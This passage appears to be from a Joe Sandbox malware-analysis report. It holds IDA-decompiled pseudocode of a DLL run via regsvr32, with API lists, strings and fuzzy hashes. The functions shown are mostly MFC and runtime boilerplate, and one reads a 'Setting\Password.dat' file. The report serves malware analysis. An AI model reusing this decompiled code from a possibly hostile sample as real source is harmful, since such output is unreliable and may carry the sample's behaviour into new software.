                                                                                                                					goto L5;
                                                                                                                				} else {
                                                                                                                					_t69 = _a16;
                                                                                                                					if(_a16 != 0) {
                                                                                                                						goto L4;
                                                                                                                					}
                                                                                                                					_v8 =  *((intOrPtr*)(E1003D47E(_t69)));
                                                                                                                					_t52 = E1003D47E(_t69);
                                                                                                                					_push(_a4);
                                                                                                                					 *_t52 = 0;
                                                                                                                					E1003D617(_t62, 0x60, 0x5f, "Afx:%p:%x", _t55);
                                                                                                                					L5:
                                                                                                                					_t35 = E1003D47E(_t69);
                                                                                                                					_t70 =  *_t35;
                                                                                                                					if( *_t35 == 0) {
                                                                                                                						_t36 = E1003D47E(__eflags);
                                                                                                                						_t57 = _v8;
                                                                                                                						 *_t36 = _v8;
                                                                                                                					} else {
                                                                                                                						E10017114( *((intOrPtr*)(E1003D47E(_t70))));
                                                                                                                						_pop(_t57);
                                                                                                                					}
                                                                                                                					_push( &_v48);
                                                                                                                					_push(_t62);
                                                                                                                					_push(_t55);
                                                                                                                					_t38 = E10018524(_t55, _t57, 0, _t62, _t70);
                                                                                                                					_t71 = _t38;
                                                                                                                					if(_t38 == 0) {
                                                                                                                						_v48 = _a4;
                                                                                                                						_v44 = DefWindowProcA;
                                                                                                                						_v28 = _a16;
                                                                                                                						_v24 = _a8;
                                                                                                                						_v20 = _a12;
                                                                                                                						_push( &_v48);
                                                                                                                						_v36 = 0;
                                                                                                                						_v40 = 0;
                                                                                                                						_v32 = _t55;
                                                                                                                						_v16 = 0;
                                                                                                                						_v12 = _t62;
                                                                                                                						if(E1001C4BB(_t55, _t57, 0, _t62, _t71) == 0) {
                                                                                                                							E10023F14(_t57);
                                                                                                                						}
                                                                                                                					}
                                                                                                                					return _t62;
                                                                                                                				}
                                                                                                                			}





























                                                                                                                APIs
                                                                                                                • __snprintf_s.LIBCMT ref: 1001C594
                                                                                                                  • Part of subcall function 1003D617: __vsnprintf_s_l.LIBCMT ref: 1003D62C
                                                                                                                • __snprintf_s.LIBCMT ref: 1001C5C6
                                                                                                                  • Part of subcall function 1003D47E: __getptd_noexit.LIBCMT ref: 1003D47E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __snprintf_s$__getptd_noexit__vsnprintf_s_l
                                                                                                                • String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
                                                                                                                • API String ID: 3029210900-2801496823
                                                                                                                • Opcode ID: 333637defcf45e8313df684a811178f8c81ddf9b6db8f5b4b46f02d966457cc3
                                                                                                                • Instruction ID: d972ff4ffa584f777f92cac134705a8847247c5c9bfb85dde4d4857cc9004a4d
                                                                                                                • Opcode Fuzzy Hash: 333637defcf45e8313df684a811178f8c81ddf9b6db8f5b4b46f02d966457cc3
                                                                                                                • Instruction Fuzzy Hash: A13170B9D0060DEFCB12EFA9D841D8EBBF5EF08251F104066F914AB211D770EA90DB61
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 81%
                                                                                                                			E10009BE0(void* __ecx, RECT* __edx, void* __edi, void* __ebp, void* __eflags) {
                                                                                                                				char _v4;
                                                                                                                				char _v12;
                                                                                                                				char _v16;
                                                                                                                				char _v20;
                                                                                                                				intOrPtr _v24;
                                                                                                                				char _v28;
                                                                                                                				char _v32;
                                                                                                                				char _v120;
                                                                                                                				void* _v224;
                                                                                                                				char _v228;
                                                                                                                				char _v236;
                                                                                                                				char _v240;
                                                                                                                				struct tagRECT _v256;
                                                                                                                				void* __ebx;
                                                                                                                				void* __esi;
                                                                                                                				signed int _t33;
                                                                                                                				void* _t38;
                                                                                                                				void* _t40;
                                                                                                                				void* _t48;
                                                                                                                				void* _t76;
                                                                                                                				void* _t79;
                                                                                                                				void* _t82;
                                                                                                                
                                                                                                                				_t82 = __eflags;
                                                                                                                				_t74 = __edi;
                                                                                                                				_t73 = __edx;
                                                                                                                				_push(0xffffffff);
                                                                                                                				_push(E10051361);
                                                                                                                				_push( *[fs:0x0]);
                                                                                                                				_t33 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_push(_t33 ^ _t79 - 0x000000e8);
                                                                                                                				 *[fs:0x0] =  &_v12;
                                                                                                                				_t76 = __ecx;
                                                                                                                				E10021017(__ecx, __edi);
                                                                                                                				E100205E2( &_v228, _t82);
                                                                                                                				_push(0);
                                                                                                                				_push(0x40);
                                                                                                                				_push("Setting\\Password.dat");
                                                                                                                				_v4 = 0;
                                                                                                                				_t38 = E10020A24( &_v228, __edx, _t82);
                                                                                                                				_t83 = _t38;
                                                                                                                				if(_t38 == 0) {
                                                                                                                					E10012C70(0);
                                                                                                                					_v20 = 1;
                                                                                                                					_t40 = E10021343(0,  &_v228, __edx, __edi, _t76, __eflags);
                                                                                                                					__eflags = _t40 - 1;
                                                                                                                					if(_t40 != 1) {
                                                                                                                						do {
                                                                                                                							E10018B24(_t76, 0x10057aa0, 0, 0);
                                                                                                                							_v28 = 2;
                                                                                                                							E10021AF5( &_v120, __edi, _t76, __eflags);
                                                                                                                							_v28 = 0;
                                                                                                                							E10020C98( &_v236, _t74, _t76, __eflags);
                                                                                                                							E10012C70(0);
                                                                                                                							_v32 = 1;
                                                                                                                							_t48 = E10021343(0,  &_v240, __edx, _t74, _t76, __eflags);
                                                                                                                							__eflags = _t48 - 1;
                                                                                                                						} while (_t48 != 1);
                                                                                                                					}
                                                                                                                					_v16 = 0;
                                                                                                                					E10008C00();
                                                                                                                				} else {
                                                                                                                					E10020580(0,  &_v240);
                                                                                                                					GetWindowRect( *(_t76 + 0x20),  &_v256);
                                                                                                                					_v256.top = _v256.top + 0x1e;
                                                                                                                					_v256.left = _v256.left + 0xa;
                                                                                                                					_v256.right = _v256.right - 0xa;
                                                                                                                					_v256.bottom = _v256.bottom - 0xa;
                                                                                                                					_t73 =  &_v256;
                                                                                                                					ClipCursor( &_v256);
                                                                                                                				}
                                                                                                                				_v16 = 0xffffffff;
                                                                                                                				E100206EF(0,  &_v240, _t73, _t74, _t76, _t83);
                                                                                                                				 *[fs:0x0] = _v24;
                                                                                                                				return 1;
                                                                                                                			}


























                                                                                                                APIs
                                                                                                                  • Part of subcall function 10020A24: lstrlenA.KERNEL32(?,?,?,00000000), ref: 10020A81
                                                                                                                • ~_Task_impl.LIBCPMT ref: 10009CB4
                                                                                                                  • Part of subcall function 10020580: CloseHandle.KERNEL32(000000FF), ref: 1002058F
                                                                                                                  • Part of subcall function 10020580: GetLastError.KERNEL32(?,00000000,?,1002073F,00000010), ref: 100205B4
                                                                                                                • GetWindowRect.USER32 ref: 10009C4B
                                                                                                                • ClipCursor.USER32(?), ref: 10009C6C
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClipCloseCursorErrorHandleLastRectTask_implWindowlstrlen
                                                                                                                • String ID: Setting\Password.dat
                                                                                                                • API String ID: 2701217368-1754286627
                                                                                                                • Opcode ID: c1d1bf8ec7f58d1d16a60e7e9fd7f9c19ea953c6c2c7c449cc09f10ed1687830
                                                                                                                • Instruction ID: 7fdc33bab3f21b8ff2c69fda66046c078474f5097c893bf9ed9bb2d73ed06e14
                                                                                                                • Opcode Fuzzy Hash: c1d1bf8ec7f58d1d16a60e7e9fd7f9c19ea953c6c2c7c449cc09f10ed1687830
                                                                                                                • Instruction Fuzzy Hash: 7C3140780483819FE324DB24D891FAFB7E5EF94354F40492DF49942582EB35AA08CF63
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __localtime64_s
                                                                                                                • String ID: %d:%d:%d
                                                                                                                • API String ID: 773316593-941173414
                                                                                                                • Opcode ID: 356ba05f74cac8944baaa89dd961476bd924575323f166557d3ed5bfcef7fcb3
                                                                                                                • Instruction ID: 455198fe55c0233317231f3666cbef1b3bb113cec9faf2e7746caa1284f20c57
                                                                                                                • Opcode Fuzzy Hash: 356ba05f74cac8944baaa89dd961476bd924575323f166557d3ed5bfcef7fcb3
                                                                                                                • Instruction Fuzzy Hash: 311160726483409FD320CA618C42F9FB3E8EB85711F194A1CFA559F1D1E772EA488B92
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 90%
                                                                                                                			E1001AE98(void* __ebx, void* __edi, void* __ebp, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                				intOrPtr _v0;
                                                                                                                				intOrPtr _v4;
                                                                                                                				void* __esi;
                                                                                                                				struct HINSTANCE__* _t16;
                                                                                                                				_Unknown_base(*)()* _t17;
                                                                                                                				void* _t25;
                                                                                                                				void* _t26;
                                                                                                                				void* _t28;
                                                                                                                
                                                                                                                				_t28 = __eflags;
                                                                                                                				_t24 = __edi;
                                                                                                                				_t21 = __ebx;
                                                                                                                				E1002D9C0(__ebx, _t25, __ebp, 0xc);
                                                                                                                				_push(E1001A21A);
                                                                                                                				_t26 = E1002D1BB(__ebx, 0x10070ad8, __edi, _t25, _t28);
                                                                                                                				_t29 = _t26;
                                                                                                                				if(_t26 == 0) {
                                                                                                                					E1001729E(_t21, 0x10070ad8, __edi, _t26, _t29);
                                                                                                                				}
                                                                                                                				_t30 =  *(_t26 + 8);
                                                                                                                				if( *(_t26 + 8) != 0) {
                                                                                                                					L7:
                                                                                                                					E1002DA2D(0xc);
                                                                                                                					return  *(_t26 + 8)(_v4, _v0, _a4, _a8);
                                                                                                                				} else {
                                                                                                                					_push("hhctrl.ocx");
                                                                                                                					_t16 = E10018792(_t21, 0x10070ad8, _t24, _t26, _t30);
                                                                                                                					 *(_t26 + 4) = _t16;
                                                                                                                					if(_t16 != 0) {
                                                                                                                						_t17 = GetProcAddress(_t16, "HtmlHelpA");
                                                                                                                						__eflags = _t17;
                                                                                                                						 *(_t26 + 8) = _t17;
                                                                                                                						if(_t17 != 0) {
                                                                                                                							goto L7;
                                                                                                                						}
                                                                                                                						FreeLibrary( *(_t26 + 4));
                                                                                                                						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
                                                                                                                					}
                                                                                                                					return 0;
                                                                                                                				}
                                                                                                                			}












                                                                                                                APIs
                                                                                                                  • Part of subcall function 1002D9C0: EnterCriticalSection.KERNEL32(10070EA0,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002D9FC
                                                                                                                  • Part of subcall function 1002D9C0: InitializeCriticalSection.KERNEL32(?,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002DA0B
                                                                                                                  • Part of subcall function 1002D9C0: LeaveCriticalSection.KERNEL32(10070EA0,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002DA18
                                                                                                                  • Part of subcall function 1002D9C0: EnterCriticalSection.KERNEL32(?,?,?,00000000,?,1002D1D6,00000010,00000008,100231B5,10023158,100172B8,1000BF50,?,DF7C0CDA), ref: 1002DA24
                                                                                                                  • Part of subcall function 1002D1BB: __EH_prolog3_catch.LIBCMT ref: 1002D1C2
                                                                                                                  • Part of subcall function 1001729E: __CxxThrowException@8.LIBCMT ref: 100172B2
                                                                                                                  • Part of subcall function 1001729E: __EH_prolog3.LIBCMT ref: 100172BF
                                                                                                                • GetProcAddress.KERNEL32(00000000,HtmlHelpA,Function_0001A21A,0000000C), ref: 1001AEDC
                                                                                                                • FreeLibrary.KERNEL32(?), ref: 1001AEEC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
                                                                                                                • String ID: HtmlHelpA$hhctrl.ocx
                                                                                                                • API String ID: 2853499158-63838506
                                                                                                                • Opcode ID: 22437ce6a35056d78bd2381d953ef84ef7d2e637a5dc36ff30e61c36f9131e95
                                                                                                                • Instruction ID: 61f40ce6bb001f17a784296407782c6632abb58eb1890d6c41790b6c3921499c
                                                                                                                • Opcode Fuzzy Hash: 22437ce6a35056d78bd2381d953ef84ef7d2e637a5dc36ff30e61c36f9131e95
                                                                                                                • Instruction Fuzzy Hash: E101C831404713EBD711EFA0ED09B4B77D0EF49752F008819F596A9861CB30DCD09B22
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 65%
                                                                                                                			E1004735E() {
                                                                                                                				signed long long _v12;
                                                                                                                				signed int _v20;
                                                                                                                				signed long long _v28;
                                                                                                                				signed char _t8;
                                                                                                                
                                                                                                                				_t8 = GetModuleHandleA("KERNEL32");
                                                                                                                				if(_t8 == 0) {
                                                                                                                					L6:
                                                                                                                					_v20 =  *0x1005e7e0;
                                                                                                                					_v28 =  *0x1005e7d8;
                                                                                                                					asm("fsubr qword [ebp-0x18]");
                                                                                                                					_v12 = _v28 / _v20 * _v20;
                                                                                                                					asm("fld1");
                                                                                                                					asm("fcomp qword [ebp-0x8]");
                                                                                                                					asm("fnstsw ax");
                                                                                                                					if((_t8 & 0x00000005) != 0) {
                                                                                                                						return 0;
                                                                                                                					} else {
                                                                                                                						return 1;
                                                                                                                					}
                                                                                                                				} else {
                                                                                                                					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                                                                                                                					if(__eax == 0) {
                                                                                                                						goto L6;
                                                                                                                					} else {
                                                                                                                						_push(0);
                                                                                                                						return __eax;
                                                                                                                					}
                                                                                                                				}
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(KERNEL32,1003C1C4), ref: 10047363
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 10047373
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                • API String ID: 1646373207-3105848591
                                                                                                                • Opcode ID: 2d59ff89ac0dd6fbb30913566da9440524686e14bcae27ae8b3f9bffbcfe6194
                                                                                                                • Instruction ID: 21b191febf41880ee88891c179b8a5da762f4a99b1468043d4cf4c0a0f9574bc
                                                                                                                • Opcode Fuzzy Hash: 2d59ff89ac0dd6fbb30913566da9440524686e14bcae27ae8b3f9bffbcfe6194
                                                                                                                • Instruction Fuzzy Hash: 26F05430900A1DD2FF00AFB5AD492AE7AB8FB44743F9245E0E5D5E1084DF308574E646
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 100%
                                                                                                                			E1000BEB0(void* __ecx, intOrPtr* _a4) {
                                                                                                                				intOrPtr* _t14;
                                                                                                                				struct HINSTANCE__* _t18;
                                                                                                                				signed int _t20;
                                                                                                                				void* _t24;
                                                                                                                
                                                                                                                				_t24 = __ecx;
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x2c)) == 0) {
                                                                                                                					if( *((intOrPtr*)(__ecx + 4)) == 0) {
                                                                                                                						_t18 = GetModuleHandleA( *(__ecx + 0xc));
                                                                                                                						 *(_t24 + 4) = _t18;
                                                                                                                						if(_t18 == 0) {
                                                                                                                							_t20 = LoadLibraryA( *(_t24 + 0xc));
                                                                                                                							 *(_t24 + 4) = _t20;
                                                                                                                							 *((char*)(_t24 + 8)) = _t20 & 0xffffff00 | _t20 != 0x00000000;
                                                                                                                						}
                                                                                                                					}
                                                                                                                					 *((intOrPtr*)(_t24 + 0x2c)) = GetProcAddress( *(_t24 + 4), "ImageList_ReplaceIcon");
                                                                                                                				}
                                                                                                                				_t14 = _a4;
                                                                                                                				 *_t14 =  *((intOrPtr*)(_t24 + 0x2c));
                                                                                                                				return _t14;
                                                                                                                			}








                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(?,?,1000BF79,DF7C0CDA,?), ref: 1000BEC3
                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 1000BED4
                                                                                                                • GetProcAddress.KERNEL32(00000000,ImageList_ReplaceIcon,?,1000BF79,DF7C0CDA,?), ref: 1000BEEE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                • String ID: ImageList_ReplaceIcon
                                                                                                                • API String ID: 310444273-3264144174
                                                                                                                • Opcode ID: 8596cf452618ef1ebe18b7b474570471b20d2769ec82f521d7f34733b24ab3b8
                                                                                                                • Instruction ID: ff58c14875363006036c20859c02123cdca75185277630665b08a81ea7473ee4
                                                                                                                • Opcode Fuzzy Hash: 8596cf452618ef1ebe18b7b474570471b20d2769ec82f521d7f34733b24ab3b8
                                                                                                                • Instruction Fuzzy Hash: 08F0B275601B518FE720CF79C848A43BBE8EB1C651F01C82EE5AAC3A10DB34E940CF10
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                C-Code - Quality: 80%
                                                                                                                			E10032D33(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags, signed int _a4, signed int _a8, signed int _a12, signed int _a16, char _a20, signed int _a44, signed int _a48, signed int _a52, intOrPtr _a56, signed int _a60, intOrPtr _a64, char _a68, intOrPtr _a92, signed int _a96, signed int _a100, intOrPtr _a104, signed int _a108, intOrPtr _a112, signed int _a116, char _a120) {
                                                                                                                				signed int _v4;
                                                                                                                				intOrPtr _v12;
                                                                                                                				signed int _v16;
                                                                                                                				signed int _v20;
                                                                                                                				signed int _v24;
                                                                                                                				signed int _v28;
                                                                                                                				signed int _v32;
                                                                                                                				intOrPtr _v36;
                                                                                                                				void* _v40;
                                                                                                                				char _v124;
                                                                                                                				char _v168;
                                                                                                                				char _v176;
                                                                                                                				char _v184;
                                                                                                                				intOrPtr _v196;
                                                                                                                				signed int* __ebp;
                                                                                                                				signed int _t132;
                                                                                                                				signed int _t138;
                                                                                                                				signed int _t139;
                                                                                                                				void* _t140;
                                                                                                                				intOrPtr* _t145;
                                                                                                                				intOrPtr* _t148;
                                                                                                                				signed int _t149;
                                                                                                                				signed int _t151;
                                                                                                                				intOrPtr* _t152;
                                                                                                                				void* _t154;
                                                                                                                				intOrPtr* _t158;
                                                                                                                				signed int _t163;
                                                                                                                				intOrPtr _t164;
                                                                                                                				intOrPtr* _t166;
                                                                                                                				intOrPtr* _t168;
                                                                                                                				void* _t179;
                                                                                                                				intOrPtr _t182;
                                                                                                                				signed int _t183;
                                                                                                                				signed int _t185;
                                                                                                                				signed int* _t186;
                                                                                                                				void* _t187;
                                                                                                                				intOrPtr* _t188;
                                                                                                                				signed int _t202;
                                                                                                                				signed int _t204;
                                                                                                                				intOrPtr _t214;
                                                                                                                				intOrPtr _t220;
                                                                                                                				intOrPtr* _t222;
                                                                                                                				intOrPtr _t223;
                                                                                                                				signed int _t225;
                                                                                                                				void* _t228;
                                                                                                                				void* _t229;
                                                                                                                				void* _t231;
                                                                                                                				void* _t232;
                                                                                                                
                                                                                                                				_t188 = __ecx;
                                                                                                                				_t181 = __ebx;
                                                                                                                				_t232 = _t231 - 0x74;
                                                                                                                				_t225 =  &_v124;
                                                                                                                				_t132 =  *0x1006dbdc; // 0xdf7c0cda
                                                                                                                				_a116 = _t132 ^ _t225;
                                                                                                                				_push(0x1c);
                                                                                                                				E1003D1E6(E100548FA, __ebx, __edi, __esi);
                                                                                                                				_t222 = __ecx;
                                                                                                                				_v16 =  *((intOrPtr*)(__ecx + 0x14));
                                                                                                                				_a4 =  *((intOrPtr*)(__ecx + 0x10));
                                                                                                                				if( *((intOrPtr*)(__ecx + 0x48)) == 0) {
                                                                                                                					_t138 =  *(__ecx + 8);
                                                                                                                					__eflags = _t138;
                                                                                                                					if(_t138 != 0) {
                                                                                                                						_t215 =  &_a12;
                                                                                                                						_t139 =  *((intOrPtr*)( *_t138 + 0xc))(_t138, 0x1005f9f4,  &_a12,  &_a8);
                                                                                                                						__eflags = _t139;
                                                                                                                						if(_t139 >= 0) {
                                                                                                                							E1002F7C9( &_a12,  &_a20, 0x100600f0);
                                                                                                                							_a52 = _a52 | 0xffffffff;
                                                                                                                							_a44 = 0;
                                                                                                                							_a48 = 0;
                                                                                                                							_a56 = 0x18;
                                                                                                                							_a60 = 0;
                                                                                                                							_a64 = 0x1fb;
                                                                                                                							E1002F7C9( &_a12,  &_a68, 0x100600d8);
                                                                                                                							_t145 = _a12;
                                                                                                                							_a100 = _a100 | 0xffffffff;
                                                                                                                							_t215 =  &_a20;
                                                                                                                							_a92 = 0x1c;
                                                                                                                							_a96 = 0;
                                                                                                                							_a104 = 0x20;
                                                                                                                							_a108 = 0;
                                                                                                                							_a112 = 0x1e;
                                                                                                                							_t183 =  *((intOrPtr*)( *_t145 + 0x10))(_t145, 2,  &_a20, 0x28, 0);
                                                                                                                							__eflags = _t183;
                                                                                                                							if(_t183 >= 0) {
                                                                                                                								_t215 = 0;
                                                                                                                								_v40 = _a8;
                                                                                                                								_t148 = _a12;
                                                                                                                								_v36 = 1;
                                                                                                                								_v32 = 0;
                                                                                                                								_v28 = 0;
                                                                                                                								_v24 = 0;
                                                                                                                								_t149 =  *((intOrPtr*)( *_t148 + 0x18))(_t148, 0, 0,  &_v40);
                                                                                                                								__eflags = _t149;
                                                                                                                								 *_t225 = _t149;
                                                                                                                								if(_t149 >= 0) {
                                                                                                                									 *((intOrPtr*)(_t222 + 0x14)) = _v32;
                                                                                                                									_t151 = _v20;
                                                                                                                									_a8 = _t151;
                                                                                                                									 *(_t222 + 0x10) = _t151;
                                                                                                                									_t152 = _a12;
                                                                                                                									 *((intOrPtr*)(_t222 + 0x34)) = _v28;
                                                                                                                									 *((intOrPtr*)( *_t152 + 8))(_t152);
                                                                                                                									goto L32;
                                                                                                                								} else {
                                                                                                                									_t166 = _a12;
                                                                                                                									 *((intOrPtr*)( *_t166 + 8))(_t166);
                                                                                                                								}
                                                                                                                								goto L50;
                                                                                                                							} else {
                                                                                                                								_t168 = _a12;
                                                                                                                								 *((intOrPtr*)( *_t168 + 8))(_t168);
                                                                                                                								_t139 = _t183;
                                                                                                                							}
                                                                                                                						}
                                                                                                                					} else {
                                                                                                                						_t139 = 0;
                                                                                                                					}
                                                                                                                					goto L51;
                                                                                                                				} else {
                                                                                                                					__eax =  *(__esi + 0x4c);
                                                                                                                					__ecx =  *__eax;
                                                                                                                					__edx =  &_a16;
                                                                                                                					__eax =  *((intOrPtr*)(__ecx + 0x14))(__eax, 0x1005fbd4, __edx);
                                                                                                                					__eflags = __eax;
                                                                                                                					 *__ebp = __eax;
                                                                                                                					if(__eax < 0) {
                                                                                                                						L51:
                                                                                                                						 *[fs:0x0] = _v12;
                                                                                                                						_pop(_t220);
                                                                                                                						_pop(_t223);
                                                                                                                						_pop(_t182);
                                                                                                                						_t140 = E1003B437(_t139, _t182, _a116 ^ _t225, _t215, _t220, _t223);
                                                                                                                						__eflags =  &_a120;
                                                                                                                						return _t140;
                                                                                                                					} else {
                                                                                                                						__eax = _a16;
                                                                                                                						__ecx =  *__eax;
                                                                                                                						__edx =  &_a8;
                                                                                                                						_push( &_a8);
                                                                                                                						_push(0x1005fbb4);
                                                                                                                						_push(__eax);
                                                                                                                						__eflags = __eax;
                                                                                                                						if(__eflags >= 0) {
                                                                                                                							__eax = _a8;
                                                                                                                							__edx =  &_a12;
                                                                                                                							_push( &_a12);
                                                                                                                							_push(0x1005fcf4);
                                                                                                                							_a12 = 0;
                                                                                                                							__ecx =  *__eax;
                                                                                                                							_push(__eax);
                                                                                                                							__eflags = __eax;
                                                                                                                							if(__eflags >= 0) {
                                                                                                                								__eax = _a12;
                                                                                                                								__ecx =  *__eax;
                                                                                                                								__edx = __esi + 0x58;
                                                                                                                								__edx =  *(__esi + 4);
                                                                                                                								__edx =  *(__esi + 4) + 0xe8;
                                                                                                                								__eflags = __edx;
                                                                                                                								__eax =  *((intOrPtr*)( *__eax + 0x14))(__eax, __edx, __esi + 0x58);
                                                                                                                								__eax = _a12;
                                                                                                                								__ecx =  *__eax;
                                                                                                                								__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                                                                                							}
                                                                                                                							__eax = _a8;
                                                                                                                							__ecx =  *__eax;
                                                                                                                							__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                                                                                						}
                                                                                                                						__eax = E100160BC(__eflags, 0x14);
                                                                                                                						__eflags = __eax - __edi;
                                                                                                                						if(__eax == __edi) {
                                                                                                                							__eax = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						} else {
                                                                                                                							__ecx = __eax;
                                                                                                                							__eax = E10032586(__eax, _a16);
                                                                                                                						}
                                                                                                                						 *(__esi + 0x50) = __eax;
                                                                                                                						__eax = _a16;
                                                                                                                						__ecx =  *__eax;
                                                                                                                						__eax =  *((intOrPtr*)( *__eax + 8))(__eax);
                                                                                                                						__eax =  *(__esi + 0x50);
                                                                                                                						__ecx =  *__eax;
                                                                                                                						__eflags =  *__eax - __edi;
                                                                                                                						if(__eflags != 0) {
                                                                                                                							__eflags = __eax;
                                                                                                                							__eax = E1002F9F2(__ecx, __eax);
                                                                                                                						}
                                                                                                                						__eax = E100160BC(__eflags, 0x28);
                                                                                                                						__eflags = __eax - __edi;
                                                                                                                						if(__eax == __edi) {
                                                                                                                							__eax = 0;
                                                                                                                							__eflags = 0;
                                                                                                                						} else {
                                                                                                                							__ecx = __eax;
                                                                                                                							__eax = E1002E6F0(__eax, __edi, 0x1f40);
                                                                                                                						}
                                                                                                                						__edx =  *(__esi + 0x50);
                                                                                                                						 *(__esi + 0x54) = __eax;
